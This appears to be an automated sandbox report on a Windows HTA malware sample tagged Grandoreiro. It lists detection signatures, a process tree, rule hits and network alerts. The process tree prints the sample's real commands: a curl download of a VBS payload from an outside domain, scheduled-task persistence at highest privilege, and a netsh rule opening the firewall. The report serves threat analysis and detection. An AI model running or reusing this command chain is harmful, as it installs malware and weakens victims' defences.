Windows
Analysis Report
#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta
Overview
General Information
Sample name: | #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta (renamed because original name is a hash value) |
Original sample name: | processo_.hta |
Analysis ID: | 1546870 |
MD5: | ee585baf8691b05445c29031468a4f89 |
SHA1: | 864cd480834007a3ec9bb4d36851030bc9317c34 |
SHA256: | 882df8937c7fb3cbfd576a5d335df42a78821c8e26b1d0f88e4f4bac46ab064f |
Tags: | geo, Grandoreiro, hta, MEX, PRT, user-NDA0E |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Excessive usage of taskkill to terminate processes
Modifies the windows firewall
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
- mshta.exe (PID: 7088 cmdline: mshta.exe "C:\Users\user\Desktop\#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 1460 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 6064 cmdline: curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- cmd.exe (PID: 4456 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 3064 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- CSRPS.exe (PID: 5052 cmdline: "C:\_6724f91d7b3cb\CSRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
- schtasks.exe (PID: 5852 cmdline: SCHTASKS /Query /TN "CSRPS" MD5: 48C2FE20575769DE916F48EF0676A965)
- conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5552 cmdline: "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON /DELAY 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 5776 cmdline: SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON /DELAY 0001:00 MD5: 48C2FE20575769DE916F48EF0676A965)
- cmd.exe (PID: 2120 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe" enable=yes profile=any MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- netsh.exe (PID: 6176 cmdline: netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe" enable=yes profile=any MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
- cmd.exe (PID: 2472 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5164 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7704 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7992 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 5852 cmdline: cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 6500 cmdline: ipconfig /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- cmd.exe (PID: 1068 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 2312 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7564 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7900 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 8124 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 3544 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 4364 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7556 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7908 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 5296 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7384 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7748 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7972 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- CSRPS.exe (PID: 2120 cmdline: C:\_6724f91d7b3cb\CSRPS.exe MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
- cmd.exe (PID: 6008 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7404 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7732 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8000 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 3608 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7420 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7860 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6528 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7368 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7840 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4040 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7548 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7936 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6860 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7412 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7776 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8096 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 7396 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 7804 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 8032 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 7376 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- cmd.exe (PID: 6416 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 2852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-01T16:57:16.448567+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49741 | TCP |
2024-11-01T16:58:08.387650+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.4 | 49755 | TCP |
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Binary or memory string: | memstr_23ceda6c-8 |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 12_2_6F8DC2D0 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Dropped file: | Jump to dropped file | ||
Source: | Dropped file: | Jump to dropped file |
Source: | Process created: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |